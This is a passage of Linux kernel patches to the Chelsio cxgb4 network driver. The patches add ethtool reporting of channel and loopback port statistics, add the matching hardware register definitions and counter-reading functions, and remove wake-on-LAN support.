struct pci_device_id *ent) err = -ENOMEM; goto out_free_adapter; } + t4_write_reg(adapter, SGE_STAT_CFG_A, + STATSOURCE_T5_V(7) | STATMODE_V(0)); } setup_memwin(adapter); diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c index 35a44db29347..79b2714f1881 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c @@ -3760,24 +3760,105 @@ void t4_tp_get_tcp_stats(struct adapter *adap, struct tp_tcp_stats *v4, if (v4) { t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, val, ARRAY_SIZE(val), TP_MIB_TCP_OUT_RST_A); - v4->tcpOutRsts = STAT(OUT_RST); - v4->tcpInSegs = STAT64(IN_SEG); - v4->tcpOutSegs = STAT64(OUT_SEG); - v4->tcpRetransSegs = STAT64(RXT_SEG); + v4->tcp_out_rsts = STAT(OUT_RST); + v4->tcp_in_segs = STAT64(IN_SEG); + v4->tcp_out_segs = STAT64(OUT_SEG); + v4->tcp_retrans_segs = STAT64(RXT_SEG); } if (v6) { t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, val, ARRAY_SIZE(val), TP_MIB_TCP_V6OUT_RST_A); - v6->tcpOutRsts = STAT(OUT_RST); - v6->tcpInSegs = STAT64(IN_SEG); - v6->tcpOutSegs = STAT64(OUT_SEG); - v6->tcpRetransSegs = STAT64(RXT_SEG); + v6->tcp_out_rsts = STAT(OUT_RST); + v6->tcp_in_segs = STAT64(IN_SEG); + v6->tcp_out_segs = STAT64(OUT_SEG); + v6->tcp_retrans_segs = STAT64(RXT_SEG); } #undef STAT64 #undef STAT #undef STAT_IDX } +/** + * t4_tp_get_err_stats - read TP's error MIB counters + * @adap: the adapter + * @st: holds the counter values + * + * Returns the values of TP's error counters. 
+ */ +void t4_tp_get_err_stats(struct adapter *adap, struct tp_err_stats *st) +{ + /* T6 and later has 2 channels */ + if (adap->params.arch.nchan == NCHAN) { + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, + st->mac_in_errs, 12, TP_MIB_MAC_IN_ERR_0_A); + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, + st->tnl_cong_drops, 8, + TP_MIB_TNL_CNG_DROP_0_A); + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, + st->tnl_tx_drops, 4, + TP_MIB_TNL_DROP_0_A); + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, + st->ofld_vlan_drops, 4, + TP_MIB_OFD_VLN_DROP_0_A); + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, + st->tcp6_in_errs, 4, + TP_MIB_TCP_V6IN_ERR_0_A); + } else { + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, + st->mac_in_errs, 2, TP_MIB_MAC_IN_ERR_0_A); + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, + st->hdr_in_errs, 2, TP_MIB_HDR_IN_ERR_0_A); + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, + st->tcp_in_errs, 2, TP_MIB_TCP_IN_ERR_0_A); + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, + st->tnl_cong_drops, 2, + TP_MIB_TNL_CNG_DROP_0_A); + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, + st->ofld_chan_drops, 2, + TP_MIB_OFD_CHN_DROP_0_A); + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, + st->tnl_tx_drops, 2, TP_MIB_TNL_DROP_0_A); + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, + st->ofld_vlan_drops, 2, + TP_MIB_OFD_VLN_DROP_0_A); + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, + st->tcp6_in_errs, 2, TP_MIB_TCP_V6IN_ERR_0_A); + } + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, + &st->ofld_no_neigh, 2, TP_MIB_OFD_ARP_DROP_A); +} + +/** + * t4_tp_get_rdma_stats - read TP's RDMA MIB counters + * @adap: the adapter + * @st: holds the counter values + * + * Returns the values of TP's RDMA counters. + */ +void t4_tp_get_rdma_stats(struct adapter *adap, struct tp_rdma_stats *st) +{ + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, &st->rqe_dfr_pkt, + 2, TP_MIB_RQE_DFR_PKT_A); +} + +/** + * t4_get_usm_stats - read TP's non-TCP DDP MIB counters + * @adap: the adapter + * @st: holds the counter values + * + * Returns the values of TP's counters for non-TCP directly-placed packets. 
+ */ +void t4_get_usm_stats(struct adapter *adap, struct tp_usm_stats *st) +{ + u32 val[4]; + + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, val, 4, + TP_MIB_USM_PKTS_A); + st->frames = val[0]; + st->drops = val[1]; + st->octets = ((u64)val[2] << 32) | val[3]; +} + /** * t4_read_mtu_tbl - returns the values in the HW path MTU table * @adap: the adapter @@ -4034,6 +4115,28 @@ const char *t4_get_port_type_description(enum fw_port_type port_type) return "UNKNOWN"; } +/** + * t4_get_port_stats_offset - collect port stats relative to a previous + * snapshot + * @adap: The adapter + * @idx: The port + * @stats: Current stats to fill + * @offset: Previous stats snapshot + */ +void t4_get_port_stats_offset(struct adapter *adap, int idx, + struct port_stats *stats, + struct port_stats *offset) +{ + u64 *s, *o; + int i; + + t4_get_port_stats(adap, idx, stats); + for (i = 0, s = (u64 *)stats, o = (u64 *)offset; + i < (sizeof(struct port_stats) / sizeof(u64)); + i++, s++, o++) + *s -= *o; +} + /** * t4_get_port_stats - collect port statistics * @adap: the adapter diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h b/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h index c7fc3d3068f9..d75a80ea03bf 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h @@ -462,8 +462,13 @@ #define SGE_STAT_MATCH_A 0x10e8 #define SGE_STAT_CFG_A 0x10ec +#define STATMODE_S 2 +#define STATMODE_V(x) ((x) << STATMODE_S) + #define STATSOURCE_T5_S 9 +#define STATSOURCE_T5_M 0xfU #define STATSOURCE_T5_V(x) ((x) << STATSOURCE_T5_S) +#define STATSOURCE_T5_G(x) (((x) >> STATSOURCE_T5_S) & STATSOURCE_T5_M) #define SGE_DBFIFO_STATUS2_A 0x1118 @@ -1417,6 +1422,8 @@ #define CSUM_HAS_PSEUDO_HDR_F CSUM_HAS_PSEUDO_HDR_V(1U) #define TP_MIB_MAC_IN_ERR_0_A 0x0 +#define TP_MIB_HDR_IN_ERR_0_A 0x4 +#define TP_MIB_TCP_IN_ERR_0_A 0x8 #define TP_MIB_TCP_OUT_RST_A 0xc #define TP_MIB_TCP_IN_SEG_HI_A 0x10 #define TP_MIB_TCP_IN_SEG_LO_A 0x11 @@ -1425,11 +1432,14 @@ #define TP_MIB_TCP_RXT_SEG_HI_A 0x14 #define TP_MIB_TCP_RXT_SEG_LO_A 0x15 #define TP_MIB_TNL_CNG_DROP_0_A 0x18 +#define TP_MIB_OFD_CHN_DROP_0_A 0x1c #define TP_MIB_TCP_V6IN_ERR_0_A 0x28 #define TP_MIB_TCP_V6OUT_RST_A 0x2c #define TP_MIB_OFD_ARP_DROP_A 0x36 #define TP_MIB_TNL_DROP_0_A 0x44 #define TP_MIB_OFD_VLN_DROP_0_A 0x58 +#define TP_MIB_USM_PKTS_A 0x5c +#define TP_MIB_RQE_DFR_PKT_A 0x64 #define ULP_TX_INT_CAUSE_A 0x8dcc From a622297535b675d4444da88c499e1c35167f4622 Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Wed, 3 Jun 2015 21:04:40 +0530 Subject: [PATCH 677/872] cxgb4: Add support in ethtool to dump channel stats Add support in ethtool to dump adapter channel stats Signed-off-by: Hariprasad Shenai Signed-off-by: David S. 
Miller --- drivers/net/ethernet/chelsio/cxgb4/cxgb4.h | 14 ++++ .../ethernet/chelsio/cxgb4/cxgb4_ethtool.c | 75 ++++++++++++++++++- drivers/net/ethernet/chelsio/cxgb4/t4_hw.c | 43 +++++++++++ drivers/net/ethernet/chelsio/cxgb4/t4_regs.h | 5 ++ 4 files changed, 136 insertions(+), 1 deletion(-) diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h index 2d9bc621cc97..c8bc58987c7f 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h @@ -210,6 +210,12 @@ struct tp_usm_stats { u64 octets; }; +struct tp_fcoe_stats { + u32 frames_ddp; + u32 frames_drop; + u64 octets_ddp; +}; + struct tp_err_stats { u32 mac_in_errs[4]; u32 hdr_in_errs[4]; @@ -223,6 +229,11 @@ struct tp_err_stats { u32 ofld_cong_defer; }; +struct tp_cpl_stats { + u32 req[4]; + u32 rsp[4]; +}; + struct tp_rdma_stats { u32 rqe_dfr_pkt; u32 rqe_dfr_mod; @@ -1320,10 +1331,13 @@ void t4_tp_wr_bits_indirect(struct adapter *adap, unsigned int addr, unsigned int mask, unsigned int val); void t4_tp_read_la(struct adapter *adap, u64 *la_buf, unsigned int *wrptr); void t4_tp_get_err_stats(struct adapter *adap, struct tp_err_stats *st); +void t4_tp_get_cpl_stats(struct adapter *adap, struct tp_cpl_stats *st); void t4_tp_get_rdma_stats(struct adapter *adap, struct tp_rdma_stats *st); void t4_get_usm_stats(struct adapter *adap, struct tp_usm_stats *st); void t4_tp_get_tcp_stats(struct adapter *adap, struct tp_tcp_stats *v4, struct tp_tcp_stats *v6); +void t4_get_fcoe_stats(struct adapter *adap, unsigned int idx, + struct tp_fcoe_stats *st); void t4_load_mtus(struct adapter *adap, const unsigned short *mtus, const unsigned short *alpha, const unsigned short *beta); diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c index 63b1ae608d1f..ada33c21b8c0 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c @@ -133,12 +133,30 @@ static char adapter_stats_strings[][ETH_GSTRING_LEN] = { "write_coal_fail ", }; +static char channel_stats_strings[][ETH_GSTRING_LEN] = { + "--------Channel--------- ", + "tp_cpl_requests ", + "tp_cpl_responses ", + "tp_mac_in_errs ", + "tp_hdr_in_errs ", + "tp_tcp_in_errs ", + "tp_tcp6_in_errs ", + "tp_tnl_cong_drops ", + "tp_tnl_tx_drops ", + "tp_ofld_vlan_drops ", + "tp_ofld_chan_drops ", + "fcoe_octets_ddp ", + "fcoe_frames_ddp ", + "fcoe_frames_drop ", +}; + static int get_sset_count(struct net_device *dev, int sset) { switch (sset) { case ETH_SS_STATS: return ARRAY_SIZE(stats_strings) + - ARRAY_SIZE(adapter_stats_strings); + ARRAY_SIZE(adapter_stats_strings) + + ARRAY_SIZE(channel_stats_strings); default: return -EOPNOTSUPP; } @@ -195,6 +213,9 @@ static void get_strings(struct net_device *dev, u32 stringset, u8 *data) data += sizeof(stats_strings); memcpy(data, adapter_stats_strings, sizeof(adapter_stats_strings)); + data += sizeof(adapter_stats_strings); + memcpy(data, channel_stats_strings, + sizeof(channel_stats_strings)); } } @@ -234,6 +255,22 @@ struct adapter_stats { u64 wc_fail; }; +struct channel_stats { + u64 cpl_req; + u64 cpl_rsp; + u64 mac_in_errs; + u64 hdr_in_errs; + u64 tcp_in_errs; + u64 tcp6_in_errs; + u64 tnl_cong_drops; + u64 tnl_tx_drops; + u64 ofld_vlan_drops; + u64 ofld_chan_drops; + u64 octets_ddp; + u64 frames_ddp; + u64 frames_drop; +}; + static void collect_sge_port_stats(const struct adapter *adap, const struct port_info *p, struct queue_port_stats *s) @@ -308,6 
+345,36 @@ static void collect_adapter_stats(struct adapter *adap, struct adapter_stats *s) } } +static void collect_channel_stats(struct adapter *adap, struct channel_stats *s, + u8 i) +{ + struct tp_cpl_stats cpl_stats; + struct tp_err_stats err_stats; + struct tp_fcoe_stats fcoe_stats; + + memset(s, 0, sizeof(*s)); + + spin_lock(&adap->stats_lock); + t4_tp_get_cpl_stats(adap, &cpl_stats); + t4_tp_get_err_stats(adap, &err_stats); + t4_get_fcoe_stats(adap, i, &fcoe_stats); + spin_unlock(&adap->stats_lock); + + s->cpl_req = cpl_stats.req[i]; + s->cpl_rsp = cpl_stats.rsp[i]; + s->mac_in_errs = err_stats.mac_in_errs[i]; + s->hdr_in_errs = err_stats.hdr_in_errs[i]; + s->tcp_in_errs = err_stats.tcp_in_errs[i]; + s->tcp6_in_errs = err_stats.tcp6_in_errs[i]; + s->tnl_cong_drops = err_stats.tnl_cong_drops[i]; + s->tnl_tx_drops = err_stats.tnl_tx_drops[i]; + s->ofld_vlan_drops = err_stats.ofld_vlan_drops[i]; + s->ofld_chan_drops = err_stats.ofld_chan_drops[i]; + s->octets_ddp = fcoe_stats.octets_ddp; + s->frames_ddp = fcoe_stats.frames_ddp; + s->frames_drop = fcoe_stats.frames_drop; +} + static void get_stats(struct net_device *dev, struct ethtool_stats *stats, u64 *data) { @@ -322,6 +389,12 @@ static void get_stats(struct net_device *dev, struct ethtool_stats *stats, collect_sge_port_stats(adapter, pi, (struct queue_port_stats *)data); data += sizeof(struct queue_port_stats) / sizeof(u64); collect_adapter_stats(adapter, (struct adapter_stats *)data); + data += sizeof(struct adapter_stats) / sizeof(u64); + + *data++ = (u64)pi->port_id; + collect_channel_stats(adapter, (struct channel_stats *)data, + pi->port_id); + } static void get_regs(struct net_device *dev, struct ethtool_regs *regs, diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c index 79b2714f1881..e8bfe6f0dd7c 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c @@ -3828,6 +3828,27 @@ void t4_tp_get_err_stats(struct adapter *adap, struct tp_err_stats *st) &st->ofld_no_neigh, 2, TP_MIB_OFD_ARP_DROP_A); } +/** + * t4_tp_get_cpl_stats - read TP's CPL MIB counters + * @adap: the adapter + * @st: holds the counter values + * + * Returns the values of TP's CPL counters. + */ +void t4_tp_get_cpl_stats(struct adapter *adap, struct tp_cpl_stats *st) +{ + /* T6 and later has 2 channels */ + if (adap->params.arch.nchan == NCHAN) { + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, st->req, + 8, TP_MIB_CPL_IN_REQ_0_A); + } else { + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, st->req, + 2, TP_MIB_CPL_IN_REQ_0_A); + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, st->rsp, + 2, TP_MIB_CPL_OUT_RSP_0_A); + } +} + /** * t4_tp_get_rdma_stats - read TP's RDMA MIB counters * @adap: the adapter @@ -3841,6 +3862,28 @@ void t4_tp_get_rdma_stats(struct adapter *adap, struct tp_rdma_stats *st) 2, TP_MIB_RQE_DFR_PKT_A); } +/** + * t4_get_fcoe_stats - read TP's FCoE MIB counters for a port + * @adap: the adapter + * @idx: the port index + * @st: holds the counter values + * + * Returns the values of TP's FCoE counters for the selected port. 
+ */ +void t4_get_fcoe_stats(struct adapter *adap, unsigned int idx, + struct tp_fcoe_stats *st) +{ + u32 val[2]; + + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, &st->frames_ddp, + 1, TP_MIB_FCOE_DDP_0_A + idx); + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, &st->frames_drop, + 1, TP_MIB_FCOE_DROP_0_A + idx); + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, val, + 2, TP_MIB_FCOE_BYTE_0_HI_A + 2 * idx); + st->octets_ddp = ((u64)val[0] << 32) | val[1]; +} + /** * t4_get_usm_stats - read TP's non-TCP DDP MIB counters * @adap: the adapter diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h b/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h index d75a80ea03bf..3273a4c67e84 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h @@ -1436,7 +1436,12 @@ #define TP_MIB_TCP_V6IN_ERR_0_A 0x28 #define TP_MIB_TCP_V6OUT_RST_A 0x2c #define TP_MIB_OFD_ARP_DROP_A 0x36 +#define TP_MIB_CPL_IN_REQ_0_A 0x38 +#define TP_MIB_CPL_OUT_RSP_0_A 0x3c #define TP_MIB_TNL_DROP_0_A 0x44 +#define TP_MIB_FCOE_DDP_0_A 0x48 +#define TP_MIB_FCOE_DROP_0_A 0x4c +#define TP_MIB_FCOE_BYTE_0_HI_A 0x50 #define TP_MIB_OFD_VLN_DROP_0_A 0x58 #define TP_MIB_USM_PKTS_A 0x5c #define TP_MIB_RQE_DFR_PKT_A 0x64 From 65046e84144f5f462107a313b404bcbd52d6dd93 Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Wed, 3 Jun 2015 21:04:41 +0530 Subject: [PATCH 678/872] cxgb4: Add support to dump loopback port stats Add support in ethtool to dump loopback port statistics Signed-off-by: Hariprasad Shenai Signed-off-by: David S. Miller --- drivers/net/ethernet/chelsio/cxgb4/cxgb4.h | 1 + .../ethernet/chelsio/cxgb4/cxgb4_ethtool.c | 43 ++++++++++++++++- drivers/net/ethernet/chelsio/cxgb4/t4_hw.c | 48 +++++++++++++++++++ drivers/net/ethernet/chelsio/cxgb4/t4_regs.h | 1 + 4 files changed, 92 insertions(+), 1 deletion(-) diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h index c8bc58987c7f..9aab32e8c38a 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h @@ -1325,6 +1325,7 @@ void t4_get_port_stats(struct adapter *adap, int idx, struct port_stats *p); void t4_get_port_stats_offset(struct adapter *adap, int idx, struct port_stats *stats, struct port_stats *offset); +void t4_get_lb_stats(struct adapter *adap, int idx, struct lb_port_stats *p); void t4_read_mtu_tbl(struct adapter *adap, u16 *mtus, u8 *mtu_log); void t4_read_cong_tbl(struct adapter *adap, u16 incr[NMTUS][NCCTRL_WIN]); void t4_tp_wr_bits_indirect(struct adapter *adap, unsigned int addr, diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c index ada33c21b8c0..36f6ff2648b3 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c @@ -150,13 +150,40 @@ static char channel_stats_strings[][ETH_GSTRING_LEN] = { "fcoe_frames_drop ", }; +static char loopback_stats_strings[][ETH_GSTRING_LEN] = { + "-------Loopback----------- ", + "octets_ok ", + "frames_ok ", + "bcast_frames ", + "mcast_frames ", + "ucast_frames ", + "error_frames ", + "frames_64 ", + "frames_65_to_127 ", + "frames_128_to_255 ", + "frames_256_to_511 ", + "frames_512_to_1023 ", + "frames_1024_to_1518 ", + "frames_1519_to_max ", + "frames_dropped ", + "bg0_frames_dropped ", + "bg1_frames_dropped ", + "bg2_frames_dropped ", + "bg3_frames_dropped ", + "bg0_frames_trunc ", + "bg1_frames_trunc ", + "bg2_frames_trunc ", + 
"bg3_frames_trunc ", +}; + static int get_sset_count(struct net_device *dev, int sset) { switch (sset) { case ETH_SS_STATS: return ARRAY_SIZE(stats_strings) + ARRAY_SIZE(adapter_stats_strings) + - ARRAY_SIZE(channel_stats_strings); + ARRAY_SIZE(channel_stats_strings) + + ARRAY_SIZE(loopback_stats_strings); default: return -EOPNOTSUPP; } @@ -216,6 +243,9 @@ static void get_strings(struct net_device *dev, u32 stringset, u8 *data) data += sizeof(adapter_stats_strings); memcpy(data, channel_stats_strings, sizeof(channel_stats_strings)); + data += sizeof(channel_stats_strings); + memcpy(data, loopback_stats_strings, + sizeof(loopback_stats_strings)); } } @@ -380,6 +410,9 @@ static void get_stats(struct net_device *dev, struct ethtool_stats *stats, { struct port_info *pi = netdev_priv(dev); struct adapter *adapter = pi->adapter; + struct lb_port_stats s; + int i; + u64 *p0; t4_get_port_stats_offset(adapter, pi->tx_chan, (struct port_stats *)data, @@ -394,7 +427,15 @@ static void get_stats(struct net_device *dev, struct ethtool_stats *stats, *data++ = (u64)pi->port_id; collect_channel_stats(adapter, (struct channel_stats *)data, pi->port_id); + data += sizeof(struct channel_stats) / sizeof(u64); + + *data++ = (u64)pi->port_id; + memset(&s, 0, sizeof(s)); + t4_get_lb_stats(adapter, pi->port_id, &s); + p0 = &s.octets; + for (i = 0; i < ARRAY_SIZE(loopback_stats_strings) - 1; i++) + *data++ = (unsigned long long)*p0++; } static void get_regs(struct net_device *dev, struct ethtool_regs *regs, diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c index e8bfe6f0dd7c..c95714ea1444 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c @@ -4263,6 +4263,54 @@ void t4_get_port_stats(struct adapter *adap, int idx, struct port_stats *p) #undef GET_STAT_COM } +/** + * t4_get_lb_stats - collect loopback port statistics + * @adap: the adapter + * @idx: the loopback port index + * @p: the stats structure to fill + * + * Return HW statistics for the given loopback port. + */ +void t4_get_lb_stats(struct adapter *adap, int idx, struct lb_port_stats *p) +{ + u32 bgmap = t4_get_mps_bg_map(adap, idx); + +#define GET_STAT(name) \ + t4_read_reg64(adap, \ + (is_t4(adap->params.chip) ? \ + PORT_REG(idx, MPS_PORT_STAT_LB_PORT_##name##_L) : \ + T5_PORT_REG(idx, MPS_PORT_STAT_LB_PORT_##name##_L))) +#define GET_STAT_COM(name) t4_read_reg64(adap, MPS_STAT_##name##_L) + + p->octets = GET_STAT(BYTES); + p->frames = GET_STAT(FRAMES); + p->bcast_frames = GET_STAT(BCAST); + p->mcast_frames = GET_STAT(MCAST); + p->ucast_frames = GET_STAT(UCAST); + p->error_frames = GET_STAT(ERROR); + + p->frames_64 = GET_STAT(64B); + p->frames_65_127 = GET_STAT(65B_127B); + p->frames_128_255 = GET_STAT(128B_255B); + p->frames_256_511 = GET_STAT(256B_511B); + p->frames_512_1023 = GET_STAT(512B_1023B); + p->frames_1024_1518 = GET_STAT(1024B_1518B); + p->frames_1519_max = GET_STAT(1519B_MAX); + p->drop = GET_STAT(DROP_FRAMES); + + p->ovflow0 = (bgmap & 1) ? GET_STAT_COM(RX_BG_0_LB_DROP_FRAME) : 0; + p->ovflow1 = (bgmap & 2) ? GET_STAT_COM(RX_BG_1_LB_DROP_FRAME) : 0; + p->ovflow2 = (bgmap & 4) ? GET_STAT_COM(RX_BG_2_LB_DROP_FRAME) : 0; + p->ovflow3 = (bgmap & 8) ? GET_STAT_COM(RX_BG_3_LB_DROP_FRAME) : 0; + p->trunc0 = (bgmap & 1) ? GET_STAT_COM(RX_BG_0_LB_TRUNC_FRAME) : 0; + p->trunc1 = (bgmap & 2) ? GET_STAT_COM(RX_BG_1_LB_TRUNC_FRAME) : 0; + p->trunc2 = (bgmap & 4) ? GET_STAT_COM(RX_BG_2_LB_TRUNC_FRAME) : 0; + p->trunc3 = (bgmap & 8) ? 
GET_STAT_COM(RX_BG_3_LB_TRUNC_FRAME) : 0; + +#undef GET_STAT +#undef GET_STAT_COM +} + /** * t4_wol_magic_enable - enable/disable magic packet WoL * @adap: the adapter diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h b/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h index 3273a4c67e84..af3462db5adb 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h @@ -1605,6 +1605,7 @@ #define MPS_PORT_STAT_LB_PORT_1519B_MAX_L 0x520 #define MPS_PORT_STAT_LB_PORT_1519B_MAX_H 0x524 #define MPS_PORT_STAT_LB_PORT_DROP_FRAMES 0x528 +#define MPS_PORT_STAT_LB_PORT_DROP_FRAMES_L 0x528 #define MPS_PORT_STAT_RX_PORT_BYTES_L 0x540 #define MPS_PORT_STAT_RX_PORT_BYTES_H 0x544 #define MPS_PORT_STAT_RX_PORT_FRAMES_L 0x548 From e2d14b42c25cb765df07d585a919b8c1c8b82e78 Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Wed, 3 Jun 2015 21:04:42 +0530 Subject: [PATCH 679/872] cxgb4: Remove WOL get/set ethtool support Remove ethtool get/set support for wake on lan, adapter doesn't support it. Signed-off-by: Hariprasad Shenai Signed-off-by: David S. Miller --- drivers/net/ethernet/chelsio/cxgb4/cxgb4.h | 2 - .../ethernet/chelsio/cxgb4/cxgb4_ethtool.c | 33 ------ drivers/net/ethernet/chelsio/cxgb4/t4_hw.c | 100 ------------------ drivers/net/ethernet/chelsio/cxgb4/t4_hw.h | 2 - 4 files changed, 137 deletions(-) diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h index 9aab32e8c38a..bf2b822d0e8e 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h @@ -732,8 +732,6 @@ struct adapter { struct cxgb4_virt_res vres; unsigned int swintr; - unsigned int wol; - struct { unsigned short vec; char desc[IFNAMSIZ + 10]; diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c index 36f6ff2648b3..0194c91a0486 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c @@ -947,37 +947,6 @@ static int set_flash(struct net_device *netdev, struct ethtool_flash *ef) return ret; } -#define WOL_SUPPORTED (WAKE_BCAST | WAKE_MAGIC) -#define BCAST_CRC 0xa0ccc1a6 - -static void get_wol(struct net_device *dev, struct ethtool_wolinfo *wol) -{ - wol->supported = WAKE_BCAST | WAKE_MAGIC; - wol->wolopts = netdev2adap(dev)->wol; - memset(&wol->sopass, 0, sizeof(wol->sopass)); -} - -static int set_wol(struct net_device *dev, struct ethtool_wolinfo *wol) -{ - int err = 0; - struct port_info *pi = netdev_priv(dev); - - if (wol->wolopts & ~WOL_SUPPORTED) - return -EINVAL; - t4_wol_magic_enable(pi->adapter, pi->tx_chan, - (wol->wolopts & WAKE_MAGIC) ? 
dev->dev_addr : NULL); - if (wol->wolopts & WAKE_BCAST) { - err = t4_wol_pat_enable(pi->adapter, pi->tx_chan, 0xfe, ~0ULL, - ~0ULL, 0, false); - if (!err) - err = t4_wol_pat_enable(pi->adapter, pi->tx_chan, 1, - ~6ULL, ~0ULL, BCAST_CRC, true); - } else { - t4_wol_pat_enable(pi->adapter, pi->tx_chan, 0, 0, 0, 0, false); - } - return err; -} - static u32 get_rss_table_size(struct net_device *dev) { const struct port_info *pi = netdev_priv(dev); @@ -1107,8 +1076,6 @@ static const struct ethtool_ops cxgb_ethtool_ops = { .get_ethtool_stats = get_stats, .get_regs_len = get_regs_len, .get_regs = get_regs, - .get_wol = get_wol, - .set_wol = set_wol, .get_rxnfc = get_rxnfc, .get_rxfh_indir_size = get_rss_table_size, .get_rxfh = get_rss_table, diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c index c95714ea1444..c21ab2686a69 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c @@ -4311,106 +4311,6 @@ void t4_get_lb_stats(struct adapter *adap, int idx, struct lb_port_stats *p) #undef GET_STAT_COM } -/** - * t4_wol_magic_enable - enable/disable magic packet WoL - * @adap: the adapter - * @port: the physical port index - * @addr: MAC address expected in magic packets, %NULL to disable - * - * Enables/disables magic packet wake-on-LAN for the selected port. - */ -void t4_wol_magic_enable(struct adapter *adap, unsigned int port, - const u8 *addr) -{ - u32 mag_id_reg_l, mag_id_reg_h, port_cfg_reg; - - if (is_t4(adap->params.chip)) { - mag_id_reg_l = PORT_REG(port, XGMAC_PORT_MAGIC_MACID_LO); - mag_id_reg_h = PORT_REG(port, XGMAC_PORT_MAGIC_MACID_HI); - port_cfg_reg = PORT_REG(port, XGMAC_PORT_CFG2_A); - } else { - mag_id_reg_l = T5_PORT_REG(port, MAC_PORT_MAGIC_MACID_LO); - mag_id_reg_h = T5_PORT_REG(port, MAC_PORT_MAGIC_MACID_HI); - port_cfg_reg = T5_PORT_REG(port, MAC_PORT_CFG2_A); - } - - if (addr) { - t4_write_reg(adap, mag_id_reg_l, - (addr[2] << 24) | (addr[3] << 16) | - (addr[4] << 8) | addr[5]); - t4_write_reg(adap, mag_id_reg_h, - (addr[0] << 8) | addr[1]); - } - t4_set_reg_field(adap, 